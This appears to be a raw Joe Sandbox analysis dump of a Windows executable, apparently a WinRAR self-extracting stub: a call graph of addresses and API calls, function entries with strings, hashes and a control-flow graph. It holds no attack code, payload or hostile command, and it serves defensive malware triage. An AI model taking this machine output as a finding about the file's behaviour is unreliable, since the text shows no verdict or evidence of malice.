28471 7ff6fe1a200f std::bad_alloc::bad_alloc 28470->28471 28472 7ff6fe1b4078 std::_Xinvalid_argument 2 API calls 28470->28472 28473 7ff6fe186b59 28470->28473 28471->28473 28474 7ff6fe1b4078 std::_Xinvalid_argument 2 API calls 28471->28474 28472->28471 28473->28440 28473->28441 28473->28442 28475 7ff6fe1a20a9 28474->28475 28477 7ff6fe194780 28476->28477 28479 7ff6fe19478a 28476->28479 28478 7ff6fe1b21d0 33 API calls 28477->28478 28478->28479 28479->28449 28481 7ff6fe1917be memcpy_s 28480->28481 28496 7ff6fe1a188e 28495->28496 28498 7ff6fe1a18a1 28496->28498 28555 7ff6fe19e948 28496->28555 28502 7ff6fe1a18d8 28498->28502 28551 7ff6fe1b236c 28498->28551 28504 7ff6fe1a1a37 28502->28504 28562 7ff6fe19a984 31 API calls _invalid_parameter_noinfo_noreturn 28502->28562 28505->28433 28506->28458 28508 7ff6fe1840d7 memcpy_s 28507->28508 28509 7ff6fe1840dd 28507->28509 28508->28440 28509->28508 28563 7ff6fe184120 33 API calls 2 library calls 28509->28563 28511->28443 28513 7ff6fe1a1f29 28512->28513 28534->28433 28552 7ff6fe1b239f 28551->28552 28553 7ff6fe1b23c8 28552->28553 28554 7ff6fe1a1870 108 API calls 28552->28554 28553->28502 28554->28552 28556 7ff6fe19ecd8 103 API calls 28555->28556 28557 7ff6fe19e95f ReleaseSemaphore 28556->28557 28558 7ff6fe19e9a3 DeleteCriticalSection CloseHandle CloseHandle 28557->28558 28559 7ff6fe19e984 28557->28559 28562->28504 28597 7ff6fe198882 28596->28597 28598 7ff6fe198892 28596->28598 28603 7ff6fe1923f0 28597->28603 28598->28127 28601 7ff6fe1b2320 _handle_error 8 API calls 28600->28601 28602 7ff6fe18f7dc 28601->28602 28602->28024 28602->28130 28604 7ff6fe19240f 28603->28604 28607 7ff6fe192aa0 101 API calls 28604->28607 28605 7ff6fe192428 28608 7ff6fe192bb0 101 API calls 28605->28608 28606 7ff6fe192438 28606->28598 28607->28605 28608->28606 28610 7ff6fe1afc94 28609->28610 28611 7ff6fe18129c 33 API calls 28610->28611 28622 7ff6fe185e67 28621->28622 28623 7ff6fe185ea5 28622->28623 28628 7ff6fe185eb7 28622->28628 28652 7ff6fe186084 28622->28652 28716 7ff6fe1828a4 82 API calls 2 library calls 28623->28716 28626 7ff6fe186134 28723 7ff6fe186fcc 82 API calls 28626->28723 28628->28626 28629 7ff6fe185f44 28628->28629 28717 7ff6fe186f38 33 API calls memcpy_s 28628->28717 28718 7ff6fe186d88 82 API calls 28629->28718 28630 7ff6fe1869af 28632 7ff6fe1b2320 _handle_error 8 API calls 28630->28632 28634 7ff6fe1869e4 28639 7ff6fe18612e 28639->28626 28643 7ff6fe186034 28643->28652 28644 7ff6fe1869ef 28648 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28644->28648 28706 7ff6fe1985f0 28652->28706 28653 7ff6fe186097 28656 7ff6fe185f5d 28656->28643 28656->28653 28719 7ff6fe18433c 82 API calls 2 library calls 28656->28719 28720 7ff6fe186d88 82 API calls 28656->28720 28721 7ff6fe18a1a0 109 API calls _handle_error 28656->28721 28667 7ff6fe185eb2 28667->28630 28667->28634 28667->28644 28704->28154 28707 7ff6fe198614 28706->28707 28708 7ff6fe19869a 28706->28708 28710 7ff6fe1840b0 33 API calls 28707->28710 28714 7ff6fe19867c 28707->28714 28709 7ff6fe1840b0 33 API calls 28708->28709 28708->28714 28711 7ff6fe1986b3 28709->28711 28712 7ff6fe19864d 28710->28712 28714->28639 28716->28667 28718->28656 28719->28656 28720->28656 28721->28656 28723->28667 28749 7ff6fe189be7 28741->28749 28742 7ff6fe189c1b 28743 7ff6fe1b2320 _handle_error 8 API calls 28742->28743 28744 7ff6fe189c9d 28743->28744 28744->28170 28746 7ff6fe189c83 28747 7ff6fe181fa0 31 API calls 28746->28747 28747->28742 28749->28742 28749->28746 28750 7ff6fe189cae 28749->28750 28876 7ff6fe195294 28749->28876 28894 7ff6fe19db60 28749->28894 28751 7ff6fe189cbf 28750->28751 28898 7ff6fe19da48 CompareStringW 28750->28898 28751->28746 28753 7ff6fe1820b0 33 API calls 28751->28753 28753->28746 28765 7ff6fe195f3a 28754->28765 28826->28162 28874->28215 28875->28215 28877 7ff6fe1952d4 28876->28877 28881 7ff6fe195312 __vcrt_FlsAlloc 28877->28881 28883 7ff6fe195339 __vcrt_FlsAlloc 28877->28883 28899 7ff6fe1a13f4 CompareStringW 28877->28899 28878 7ff6fe1b2320 _handle_error 8 API calls 28880 7ff6fe195503 28878->28880 28880->28749 28881->28883 28884 7ff6fe195382 __vcrt_FlsAlloc 28881->28884 28900 7ff6fe1a13f4 CompareStringW 28881->28900 28883->28878 28884->28883 28885 7ff6fe18129c 33 API calls 28884->28885 28886 7ff6fe195439 28884->28886 28887 7ff6fe195426 28885->28887 28889 7ff6fe19551b 28886->28889 28890 7ff6fe195489 28886->28890 28890->28883 28895 7ff6fe19db73 28894->28895 28896 7ff6fe1820b0 33 API calls 28895->28896 28897 7ff6fe19db91 28895->28897 28896->28897 28897->28749 28898->28751 28899->28881 28900->28884 28960->28340 28961->28342 28962->28346 28964 7ff6fe1987af 28963->28964 28976 7ff6fe1987df 28963->28976 28965 7ff6fe1b236c 108 API calls 28964->28965 28968 7ff6fe1987ca 28965->28968 28966 7ff6fe1b236c 108 API calls 28969 7ff6fe198814 28966->28969 28971 7ff6fe1b236c 108 API calls 28968->28971 28972 7ff6fe1b236c 108 API calls 28969->28972 28970 7ff6fe198845 28973 7ff6fe19461c 108 API calls 28970->28973 28971->28976 28974 7ff6fe19882b 28972->28974 28975 7ff6fe198851 28973->28975 28977 7ff6fe19461c 28974->28977 28976->28966 28976->28974 28978 7ff6fe194632 28977->28978 28980 7ff6fe19463a 28977->28980 28979 7ff6fe19e948 108 API calls 28978->28979 28979->28980 28980->28970 28982 7ff6fe191681 28981->28982 28983 7ff6fe19163e 28981->28983 28984 7ff6fe181fa0 31 API calls 28982->28984 28990 7ff6fe1916a0 28982->28990 28983->28982 28986 7ff6fe1931bc 51 API calls 28983->28986 28984->28982 28985 7ff6fe18e600 31 API calls 28988 7ff6fe1916de 28985->28988 28986->28983 28987 7ff6fe19175b 28989 7ff6fe1b2320 _handle_error 8 API calls 28987->28989 28988->28987 28991 7ff6fe19178d 28988->28991 28992 7ff6fe18e58a 28989->28992 28990->28985 28993 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28991->28993 28992->27948 28992->27949 28994 7ff6fe191792 28993->28994 28995->27579 28996->27586 28997->27588 28998 7ff6fe1b1491 28999 7ff6fe1b13c9 28998->28999 29000 7ff6fe1b1900 _com_raise_error 14 API calls 28999->29000 29001 7ff6fe1b1408 29000->29001 25961 7ff6fe1b03e0 25962 7ff6fe1b041f 25961->25962 25963 7ff6fe1b0497 25961->25963 25994 7ff6fe19aae0 25962->25994 25965 7ff6fe19aae0 48 API calls 25963->25965 25967 7ff6fe1b04ab 25965->25967 25969 7ff6fe19da98 48 API calls 25967->25969 25973 7ff6fe1b0442 memcpy_s 25969->25973 25971 7ff6fe1b0541 25991 7ff6fe18250c 25971->25991 25972 7ff6fe1b05cc 25977 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 25972->25977 25973->25972 25974 7ff6fe1b05c6 25973->25974 25986 7ff6fe181fa0 25973->25986 26004 7ff6fe1b7904 25974->26004 25979 7ff6fe1b05d2 25977->25979 25987 7ff6fe181fb3 25986->25987 25988 7ff6fe181fdc 25986->25988 25987->25988 25989 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 25987->25989 25988->25971 25990 7ff6fe182000 25989->25990 25992 7ff6fe182516 SetDlgItemTextW 25991->25992 25993 7ff6fe182513 25991->25993 25993->25992 25995 7ff6fe19aaf3 25994->25995 26009 7ff6fe199774 25995->26009 25998 7ff6fe19ab86 26001 7ff6fe19da98 25998->26001 25999 7ff6fe19ab58 LoadStringW 25999->25998 26000 7ff6fe19ab71 LoadStringW 25999->26000 26000->25998 26046 7ff6fe19d874 26001->26046 26139 7ff6fe1b783c 31 API calls 3 library calls 26004->26139 26006 7ff6fe1b791d 26140 7ff6fe1b7934 16 API calls abort 26006->26140 26016 7ff6fe199638 26009->26016 26012 7ff6fe1997d9 26026 7ff6fe1b2320 26012->26026 26017 7ff6fe199692 26016->26017 26018 7ff6fe199730 26016->26018 26022 7ff6fe1996c0 26017->26022 26039 7ff6fe1a0f68 WideCharToMultiByte 26017->26039 26020 7ff6fe1b2320 _handle_error 8 API calls 26018->26020 26021 7ff6fe199764 26020->26021 26021->26012 26035 7ff6fe199800 26021->26035 26025 7ff6fe1996ef 26022->26025 26041 7ff6fe19aa88 45 API calls 2 library calls 26022->26041 26042 7ff6fe1ba270 31 API calls 2 library calls 26025->26042 26027 7ff6fe1b2329 26026->26027 26028 7ff6fe1997f2 26027->26028 26029 7ff6fe1b2550 IsProcessorFeaturePresent 26027->26029 26028->25998 26028->25999 26030 7ff6fe1b2568 26029->26030 26043 7ff6fe1b2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26030->26043 26032 7ff6fe1b257b 26044 7ff6fe1b2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26032->26044 26036 7ff6fe199840 26035->26036 26038 7ff6fe199869 26035->26038 26045 7ff6fe1ba270 31 API calls 2 library calls 26036->26045 26038->26012 26040 7ff6fe1a0faa 26039->26040 26040->26022 26041->26025 26042->26018 26043->26032 26045->26038 26062 7ff6fe19d4d0 26046->26062 26050 7ff6fe19d8e5 swprintf 26059 7ff6fe19d974 26050->26059 26076 7ff6fe1b9ef0 26050->26076 26103 7ff6fe189d78 33 API calls 26050->26103 26052 7ff6fe19d9a3 26054 7ff6fe19da17 26052->26054 26056 7ff6fe19da3f 26052->26056 26055 7ff6fe1b2320 _handle_error 8 API calls 26054->26055 26057 7ff6fe19da2b 26055->26057 26058 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26056->26058 26057->25973 26060 7ff6fe19da44 26058->26060 26059->26052 26104 7ff6fe189d78 33 API calls 26059->26104 26063 7ff6fe19d665 26062->26063 26064 7ff6fe19d502 26062->26064 26066 7ff6fe19cb80 26063->26066 26064->26063 26065 7ff6fe181744 33 API calls 26064->26065 26065->26064 26067 7ff6fe19cbb6 26066->26067 26074 7ff6fe19cc80 26066->26074 26068 7ff6fe19cbc6 26067->26068 26071 7ff6fe19cc20 26067->26071 26072 7ff6fe19cc7b 26067->26072 26068->26050 26071->26068 26105 7ff6fe1b21d0 26071->26105 26114 7ff6fe181f80 33 API calls 3 library calls 26072->26114 26115 7ff6fe182004 33 API calls std::_Xinvalid_argument 26074->26115 26077 7ff6fe1b9f4e 26076->26077 26078 7ff6fe1b9f36 26076->26078 26077->26078 26080 7ff6fe1b9f58 26077->26080 26127 7ff6fe1bd69c 15 API calls memcpy_s 26078->26127 26129 7ff6fe1b7ef0 35 API calls 2 library calls 26080->26129 26081 7ff6fe1b9f3b 26128 7ff6fe1b78e4 31 API calls _invalid_parameter_noinfo 26081->26128 26084 7ff6fe1b2320 _handle_error 8 API calls 26086 7ff6fe1ba10b 26084->26086 26085 7ff6fe1b9f69 memcpy_s 26130 7ff6fe1b7e70 15 API calls memcpy_s 26085->26130 26086->26050 26088 7ff6fe1b9fd4 26131 7ff6fe1b82f8 46 API calls 3 library calls 26088->26131 26090 7ff6fe1b9fdd 26091 7ff6fe1b9fe5 26090->26091 26092 7ff6fe1ba014 26090->26092 26132 7ff6fe1bd90c 26091->26132 26094 7ff6fe1ba06c 26092->26094 26095 7ff6fe1ba023 26092->26095 26096 7ff6fe1ba092 26092->26096 26097 7ff6fe1ba01a 26092->26097 26098 7ff6fe1bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26094->26098 26100 7ff6fe1bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26095->26100 26096->26094 26099 7ff6fe1ba09c 26096->26099 26097->26094 26097->26095 26102 7ff6fe1b9f46 26098->26102 26101 7ff6fe1bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26099->26101 26100->26102 26101->26102 26102->26084 26103->26050 26104->26052 26107 7ff6fe1b21db 26105->26107 26106 7ff6fe1b21f4 26106->26068 26107->26106 26109 7ff6fe1b21fa 26107->26109 26116 7ff6fe1bbbc0 26107->26116 26112 7ff6fe1b2205 26109->26112 26119 7ff6fe1b2f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26109->26119 26120 7ff6fe181f80 33 API calls 3 library calls 26112->26120 26113 7ff6fe1b220b 26114->26074 26121 7ff6fe1bbc00 26116->26121 26119->26112 26120->26113 26126 7ff6fe1bf398 EnterCriticalSection 26121->26126 26127->26081 26128->26102 26129->26085 26130->26088 26131->26090 26133 7ff6fe1bd911 RtlFreeHeap 26132->26133 26137 7ff6fe1bd941 Concurrency::details::SchedulerProxy::DeleteThis 26132->26137 26134 7ff6fe1bd92c 26133->26134 26133->26137 26138 7ff6fe1bd69c 15 API calls memcpy_s 26134->26138 26136 7ff6fe1bd931 GetLastError 26136->26137 26137->26102 26138->26136 26139->26006 26147 7ff6fe1b20f0 26148 7ff6fe1b2106 _com_error::_com_error 26147->26148 26153 7ff6fe1b4078 26148->26153 26150 7ff6fe1b2117 26158 7ff6fe1b1900 26150->26158 26154 7ff6fe1b40b4 RtlPcToFileHeader 26153->26154 26155 7ff6fe1b4097 26153->26155 26156 7ff6fe1b40cc 26154->26156 26157 7ff6fe1b40db RaiseException 26154->26157 26155->26154 26156->26157 26157->26150 26184 7ff6fe1b1558 26158->26184 26161 7ff6fe1b198b 26162 7ff6fe1b1868 DloadReleaseSectionWriteAccess 6 API calls 26161->26162 26163 7ff6fe1b1998 RaiseException 26162->26163 26164 7ff6fe1b1bb5 26163->26164 26165 7ff6fe1b1a3d LoadLibraryExA 26167 7ff6fe1b1a54 GetLastError 26165->26167 26168 7ff6fe1b1aa9 26165->26168 26166 7ff6fe1b1b85 26192 7ff6fe1b1868 26166->26192 26173 7ff6fe1b1a7e 26167->26173 26174 7ff6fe1b1a69 26167->26174 26169 7ff6fe1b1ab4 FreeLibrary 26168->26169 26171 7ff6fe1b1abd 26168->26171 26169->26171 26170 7ff6fe1b19b4 26170->26165 26170->26166 26170->26168 26170->26171 26171->26166 26172 7ff6fe1b1b1b GetProcAddress 26171->26172 26172->26166 26175 7ff6fe1b1b30 GetLastError 26172->26175 26177 7ff6fe1b1868 DloadReleaseSectionWriteAccess 6 API calls 26173->26177 26174->26168 26174->26173 26179 7ff6fe1b1b45 26175->26179 26178 7ff6fe1b1a8b RaiseException 26177->26178 26178->26164 26179->26166 26180 7ff6fe1b1868 DloadReleaseSectionWriteAccess 6 API calls 26179->26180 26181 7ff6fe1b1b67 RaiseException 26180->26181 26182 7ff6fe1b1558 _com_raise_error 6 API calls 26181->26182 26183 7ff6fe1b1b81 26182->26183 26183->26166 26185 7ff6fe1b156e 26184->26185 26186 7ff6fe1b15d3 26184->26186 26200 7ff6fe1b1604 26185->26200 26186->26161 26186->26170 26189 7ff6fe1b15ce 26191 7ff6fe1b1604 DloadReleaseSectionWriteAccess 3 API calls 26189->26191 26191->26186 26193 7ff6fe1b1878 26192->26193 26194 7ff6fe1b18d1 26192->26194 26195 7ff6fe1b1604 DloadReleaseSectionWriteAccess 3 API calls 26193->26195 26194->26164 26196 7ff6fe1b187d 26195->26196 26197 7ff6fe1b18cc 26196->26197 26198 7ff6fe1b17d8 DloadProtectSection 3 API calls 26196->26198 26199 7ff6fe1b1604 DloadReleaseSectionWriteAccess 3 API calls 26197->26199 26198->26197 26199->26194 26201 7ff6fe1b161f 26200->26201 26202 7ff6fe1b1573 26200->26202 26201->26202 26203 7ff6fe1b1624 GetModuleHandleW 26201->26203 26202->26189 26207 7ff6fe1b17d8 26202->26207 26204 7ff6fe1b163e GetProcAddress 26203->26204 26206 7ff6fe1b1639 26203->26206 26205 7ff6fe1b1653 GetProcAddress 26204->26205 26204->26206 26205->26206 26206->26202 26209 7ff6fe1b17fa DloadProtectSection 26207->26209 26208 7ff6fe1b1802 26208->26189 26209->26208 26210 7ff6fe1b183a VirtualProtect 26209->26210 26212 7ff6fe1b16a4 VirtualQuery GetSystemInfo 26209->26212 26210->26208 26212->26210 29003 7ff6fe1b11cf 29004 7ff6fe1b1102 29003->29004 29005 7ff6fe1b1900 _com_raise_error 14 API calls 29004->29005 29006 7ff6fe1b1141 29005->29006 29006->29006 26920 7ff6fe1bbf2c 26927 7ff6fe1bbc34 26920->26927 26932 7ff6fe1bd440 35 API calls 2 library calls 26927->26932 26929 7ff6fe1bbc3f 26933 7ff6fe1bd068 35 API calls abort 26929->26933 26932->26929

                                                                                        Executed Functions

                                                                                        Function 00007FF6FE1AB190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                                        • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 255727823-2702805183
                                                                                        • Opcode ID: 83516b496832df66609d2f7752fbed995108ff099c8edb5f76a574fc7c44a595
                                                                                        • Instruction ID: 8fe1ba6ee1c6381269f7452a02f1b7093a378df598881c83728ee629883a5ffe
                                                                                        • Opcode Fuzzy Hash: 83516b496832df66609d2f7752fbed995108ff099c8edb5f76a574fc7c44a595
                                                                                        • Instruction Fuzzy Hash: 9FD29462E49A8241FB21DB26E8546FA6B51FFE5B80F404135F96D87AE5FE3CE548C300
                                                                                        Function 00007FF6FE1ACE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963windowfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                                        • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                        • API String ID: 3007431893-3916287355
                                                                                        • Opcode ID: 465fa9c0b495f8b61847ecd005979357875d1cda7aa02ff290f8600b24eee8b0
                                                                                        • Instruction ID: ec42bbd84eefdcb69cb4ce8222cb508591ec99f10cddcc8accd173fd144e11e4
                                                                                        • Opcode Fuzzy Hash: 465fa9c0b495f8b61847ecd005979357875d1cda7aa02ff290f8600b24eee8b0
                                                                                        • Instruction Fuzzy Hash: 02139462F04B4285FB10DF66D8402FD2BA1FBA4798F500536EA6D97AD9EF38D589C340
                                                                                        Function 00007FF6FE1B0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1466 7ff6fe1b0754-7ff6fe1b0829 call 7ff6fe19dfd0 call 7ff6fe1962dc call 7ff6fe1a946c call 7ff6fe1b3cf0 call 7ff6fe1a9a14 1477 7ff6fe1b0860-7ff6fe1b0883 1466->1477 1478 7ff6fe1b082b-7ff6fe1b0840 1466->1478 1479 7ff6fe1b0885-7ff6fe1b089a 1477->1479 1480 7ff6fe1b08ba-7ff6fe1b08dd 1477->1480 1481 7ff6fe1b0842-7ff6fe1b0855 1478->1481 1482 7ff6fe1b085b call 7ff6fe1b220c 1478->1482 1484 7ff6fe1b08b5 call 7ff6fe1b220c 1479->1484 1485 7ff6fe1b089c-7ff6fe1b08af 1479->1485 1486 7ff6fe1b08df-7ff6fe1b08f4 1480->1486 1487 7ff6fe1b0914-7ff6fe1b0937 1480->1487 1481->1482 1488 7ff6fe1b0ddd-7ff6fe1b0de2 call 7ff6fe1b7904 1481->1488 1482->1477 1484->1480 1485->1484 1485->1488 1490 7ff6fe1b090f call 7ff6fe1b220c 1486->1490 1491 7ff6fe1b08f6-7ff6fe1b0909 1486->1491 1492 7ff6fe1b096e-7ff6fe1b097a GetCommandLineW 1487->1492 1493 7ff6fe1b0939-7ff6fe1b094e 1487->1493 1501 7ff6fe1b0de3-7ff6fe1b0e2f call 7ff6fe1b7904 call 7ff6fe1b1900 1488->1501 1490->1487 1491->1488 1491->1490 1496 7ff6fe1b0980-7ff6fe1b09b7 call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe1acad0 1492->1496 1497 7ff6fe1b0b47-7ff6fe1b0b5e call 7ff6fe196454 1492->1497 1499 7ff6fe1b0950-7ff6fe1b0963 1493->1499 1500 7ff6fe1b0969 call 7ff6fe1b220c 1493->1500 1526 7ff6fe1b09b9-7ff6fe1b09cc 1496->1526 1527 7ff6fe1b09ec-7ff6fe1b09f3 1496->1527 1510 7ff6fe1b0b60-7ff6fe1b0b85 call 7ff6fe181fa0 call 7ff6fe1b3640 1497->1510 1511 7ff6fe1b0b89-7ff6fe1b0ce4 call 7ff6fe181fa0 SetEnvironmentVariableW GetLocalTime call 7ff6fe193e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6fe1ab014 call 7ff6fe1998ac call 7ff6fe1a67b4 * 2 DialogBoxParamW call 7ff6fe1a68a8 * 2 1497->1511 1499->1488 1499->1500 1500->1492 1521 7ff6fe1b0e34-7ff6fe1b0e6a 1501->1521 1510->1511 1571 7ff6fe1b0ce6 Sleep 1511->1571 1572 7ff6fe1b0cec-7ff6fe1b0cf3 1511->1572 1525 7ff6fe1b0e6c 1521->1525 1525->1525 1530 7ff6fe1b09ce-7ff6fe1b09e1 1526->1530 1531 7ff6fe1b09e7 call 7ff6fe1b220c 1526->1531 1532 7ff6fe1b09f9-7ff6fe1b0a13 OpenFileMappingW 1527->1532 1533 7ff6fe1b0adb-7ff6fe1b0b12 call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe1afd0c 1527->1533 1530->1501 1530->1531 1531->1527 1537 7ff6fe1b0ad0-7ff6fe1b0ad9 CloseHandle 1532->1537 1538 7ff6fe1b0a19-7ff6fe1b0a39 MapViewOfFile 1532->1538 1533->1497 1554 7ff6fe1b0b14-7ff6fe1b0b27 1533->1554 1537->1497 1538->1537 1541 7ff6fe1b0a3f-7ff6fe1b0a6f UnmapViewOfFile MapViewOfFile 1538->1541 1541->1537 1542 7ff6fe1b0a71-7ff6fe1b0aca call 7ff6fe1aa190 call 7ff6fe1afd0c call 7ff6fe19b9b4 call 7ff6fe19bb00 call 7ff6fe19bb70 UnmapViewOfFile 1541->1542 1542->1537 1557 7ff6fe1b0b42 call 7ff6fe1b220c 1554->1557 1558 7ff6fe1b0b29-7ff6fe1b0b3c 1554->1558 1557->1497 1558->1557 1561 7ff6fe1b0dd7-7ff6fe1b0ddc call 7ff6fe1b7904 1558->1561 1561->1488 1571->1572 1574 7ff6fe1b0cf5 call 7ff6fe1a9f4c 1572->1574 1575 7ff6fe1b0cfa-7ff6fe1b0d1d call 7ff6fe19b8e0 DeleteObject 1572->1575 1574->1575 1580 7ff6fe1b0d1f DeleteObject 1575->1580 1581 7ff6fe1b0d25-7ff6fe1b0d2c 1575->1581 1580->1581 1582 7ff6fe1b0d2e-7ff6fe1b0d35 1581->1582 1583 7ff6fe1b0d48-7ff6fe1b0d59 1581->1583 1582->1583 1584 7ff6fe1b0d37-7ff6fe1b0d43 call 7ff6fe18ba0c 1582->1584 1585 7ff6fe1b0d6d-7ff6fe1b0d7a 1583->1585 1586 7ff6fe1b0d5b-7ff6fe1b0d67 call 7ff6fe1afe24 CloseHandle 1583->1586 1584->1583 1587 7ff6fe1b0d9f-7ff6fe1b0da4 call 7ff6fe1a94e4 1585->1587 1588 7ff6fe1b0d7c-7ff6fe1b0d89 1585->1588 1586->1585 1597 7ff6fe1b0da9-7ff6fe1b0dd6 call 7ff6fe1b2320 1587->1597 1591 7ff6fe1b0d99-7ff6fe1b0d9b 1588->1591 1592 7ff6fe1b0d8b-7ff6fe1b0d93 1588->1592 1591->1587 1596 7ff6fe1b0d9d 1591->1596 1592->1587 1595 7ff6fe1b0d95-7ff6fe1b0d97 1592->1595 1595->1587 1596->1587
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 1048086575-3710569615
                                                                                        • Opcode ID: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
                                                                                        • Instruction ID: 790860f302ce53ab02e9c9bee46b50e15b71ba03b0bc6372a9971c38413533b2
                                                                                        • Opcode Fuzzy Hash: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
                                                                                        • Instruction Fuzzy Hash: B8124161E19B8685EB10DB26E8452B96B62FFE4794F404235FA6D86BE5FF3CE144C300
                                                                                        Function 00007FF6FE19A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
